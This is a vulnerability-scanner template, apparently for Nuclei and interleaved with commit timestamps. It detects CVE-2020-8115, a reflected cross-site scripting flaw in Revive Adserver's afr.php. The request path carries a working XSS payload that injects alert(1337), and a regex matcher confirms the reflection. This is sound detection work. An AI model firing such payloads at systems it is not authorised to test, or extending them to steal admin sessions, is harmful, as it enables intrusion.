2021-01-02 04:56:15 +00:00
id : CVE-2020-8115
2023-07-11 19:49:27 +00:00
2020-04-08 11:27:13 +00:00
info :
2022-09-08 13:28:46 +00:00
name : Revive Adserver <=5.0.3 - Cross-Site Scripting
2021-06-09 12:20:56 +00:00
author : madrobot,dwisiswant0
2020-05-25 07:49:06 +00:00
severity : medium
2021-03-24 07:00:21 +00:00
description : |
2022-09-08 13:28:46 +00:00
Revive Adserver 5.0.3 and prior contains a reflected cross-site scripting vulnerability in the publicly accessible afr.php delivery script. In older versions, it is possible to steal the session identifier and gain access to the admin interface. The query string sent to the www/delivery/afr.php script is printed back without proper escaping, allowing an attacker to execute arbitrary JavaScript code on the browser of the victim.
2021-08-18 11:37:49 +00:00
reference :
2021-03-24 07:00:21 +00:00
- https://hackerone.com/reports/775693
- https://www.revive-adserver.com/security/revive-sa-2020-001/
2022-09-08 13:28:46 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2020-8115
remediation : There are currently no known exploits. As of 3.2.2, the session identifier cannot be accessed as it is stored in an http-only cookie.
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 6.1
2021-09-10 11:26:40 +00:00
cve-id : CVE-2020-8115
cwe-id : CWE-79
2023-07-11 19:49:27 +00:00
epss-score : 0.0187
2023-04-12 10:55:48 +00:00
cpe : cpe:2.3:a:revive-adserver:revive_adserver:*:*:*:*:*:*:*:*
2023-08-31 11:46:18 +00:00
epss-percentile : 0.86916
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : revive-adserver
product : revive_adserver
tags : cve,cve2020,xss,hackerone
2023-04-27 04:28:59 +00:00
http :
2020-04-08 11:27:13 +00:00
- method : GET
path :
2020-04-09 13:02:30 +00:00
- "{{BaseURL}}/www/delivery/afr.php?refresh=10000&\")',10000000);alert(1337);setTimeout('alert(\""
2023-07-11 19:49:27 +00:00
2020-07-08 11:38:57 +00:00
matchers-condition : and
2020-04-08 11:27:13 +00:00
matchers :
2020-07-08 20:22:44 +00:00
- type : regex
2020-04-08 11:27:13 +00:00
part : body
2020-07-08 20:22:44 +00:00
regex :
2022-09-08 13:28:46 +00:00
- (?mi)window\.location\.replace\(".*alert\(1337\)
2023-07-11 19:49:27 +00:00
- type : status
status :
- 200